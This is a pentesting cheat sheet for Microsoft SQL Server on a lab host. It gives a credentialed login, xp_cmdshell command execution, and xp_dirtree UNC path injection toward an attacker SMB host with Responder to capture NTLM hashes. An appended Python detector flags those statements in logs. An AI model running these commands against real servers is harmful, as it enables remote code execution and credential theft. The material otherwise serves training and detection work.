# 1433 - Pentesting MSSQL

## Authentication with Creds

```bash
impacket-mssqlclient klendathu.vl/zim:football22@10.10.179.150 -windows-auth
```

## RCE in MSSQL

### xp_cmdshell

First, we can try to enable xp_cmdshell and then run OS commands through it. From the impacket-mssqlclient prompt, `enable_xp_cmdshell` is a built-in helper that runs the `sp_configure` calls for you, and `xp_cmdshell <command>` executes the command and prints its output:

```
enable_xp_cmdshell
xp_cmdshell whoami
```

### UNC Path Injection (xp_dirtree)

We can use xp_dirtree to make the SQL Server service account authenticate to an SMB share we control. The captured NTLM hash of that account can then either be relayed or cracked offline.

On the MSSQL server (either the impacket-mssqlclient helper or the raw T-SQL call):

```sql
-- impacket-mssqlclient helper
xp_dirtree //10.10.8.85/doesnotexists
-- equivalent raw T-SQL
EXEC master.sys.xp_dirtree '\\10.10.8.85\doesnotexists', 1, 1
```

On Kali Linux, start the listener first so the inbound authentication is captured:

```bash
sudo responder -I tun0
```

You should then see a hash for the SQL Server service account in Responder's output.

### xp_fileexist && sys.dm_os_file_exists

We can use xp_fileexist as well, and sys.dm_os_file_exists too. In SQL Server 2017, xp_fileexist was replaced by a dynamic management function called sys.dm_os_file_exists.

```sql
-- legacy extended stored procedure
xp_fileexist 'C:\'

-- Change this
EXEC master.dbo.xp_fileExist 'adsnt.dll'

-- To this (SQL Server 2017 and later)
SELECT * FROM sys.dm_os_file_exists('adsnt.dll')
```
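Added example (not from these notes): a small Python detector that, given captured T-SQL statements, flags xp_cmdshell enablement or execution and any xp_dirtree / xp_fileexist / sys.dm_os_file_exists call whose UNC path points at a host outside an allowlist, which is the server-side trace the two techniques above leave. The log line layout, the logins and the trusted host are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample of captured T-SQL statements (e.g. from a SQL Server Audit or
# Extended Events stream). The "<login> <statement>" layout is an assumption.
SAMPLE_STATEMENTS = [
    "svc_sql SELECT name FROM sys.databases",
    "zim EXEC sp_configure 'show advanced options', 1; RECONFIGURE;",
    "zim EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    "zim EXEC xp_cmdshell 'whoami'",
    "zim EXEC master.sys.xp_dirtree '\\\\10.10.8.85\\doesnotexists',1,1",
    "zim xp_dirtree //10.10.8.85/doesnotexists",
    "backup_job EXEC master.dbo.xp_fileExist '\\\\fileserver01\\backups\\full.bak'",
    "zim SELECT * FROM sys.dm_os_file_exists('adsnt.dll')",
]

# UNC hosts the SQL Server legitimately reaches (assumption; tune per environment).
TRUSTED_UNC_HOSTS = {"fileserver01"}

ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)
CMDSHELL_RE = re.compile(r"\bxp_cmdshell\b", re.I)
# File probes from this page that make the service account authenticate to a UNC host.
PROBE_RE = re.compile(r"\b(xp_dirtree|xp_fileexist|dm_os_file_exists)\b", re.I)
# Matches \\host\share or //host/share and captures the host.
UNC_RE = re.compile(r"(?:\\\\|//)([A-Za-z0-9._-]+)[\\/]")


def classify(statement: str) -> List[Dict]:
    """Return the detection rules a single statement triggers."""
    findings = []
    if ENABLE_RE.search(statement):
        findings.append({"rule": "xp_cmdshell_enabled"})
    elif CMDSHELL_RE.search(statement):
        findings.append({"rule": "xp_cmdshell_exec"})
    probe = PROBE_RE.search(statement)
    unc = UNC_RE.search(statement) if probe else None
    if unc and unc.group(1).lower() not in TRUSTED_UNC_HOSTS:
        # Probe aimed outside the allowlist: likely NTLM capture/relay attempt.
        findings.append({"rule": "unc_to_untrusted_host",
                         "proc": probe.group(1).lower(), "host": unc.group(1)})
    return findings


def scan(lines: List[str]) -> List[Dict]:
    """Classify every captured line, tagging hits with line number and login."""
    results = []
    for lineno, line in enumerate(lines, 1):
        login, _, statement = line.partition(" ")
        for finding in classify(statement):
            finding.update(line=lineno, login=login)
            results.append(finding)
    return results
```

Running `scan(SAMPLE_STATEMENTS)` yields four findings; the backup job's probe against the allowlisted file server is not reported.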
